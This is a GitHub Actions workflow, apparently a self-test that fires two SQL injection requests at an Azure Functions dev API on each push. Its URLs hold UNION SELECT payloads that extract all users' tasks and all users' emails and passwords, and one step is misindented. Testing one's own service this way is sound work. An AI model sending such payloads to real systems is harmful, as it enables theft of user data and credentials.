name: SQL-Injection-Test-User-Tasks
on:
  push:

jobs:
  injection-test:
    name: SQL Inject on GET to fetch all user Tasks
    runs-on: ubuntu-latest

    steps:
    - name: GET all users tasks
      uses: distributhor/workflow-webhook
      with:
        url: "https://nsc-func-dev-usw2-tuesday.azurewebsites.net/api/users/14641 UNION SELECT taskId, taskUserId, title, taskDescription FROM tasks/tasks"
     - name: GET all users email and passwords
      uses: distributhor/workflow-webhook
      with:
        url: "https://nsc-func-dev-usw2-tuesday.azurewebsites.net/api/users/14641 UNION select userid, userid, email, userpassword from users/tasks"    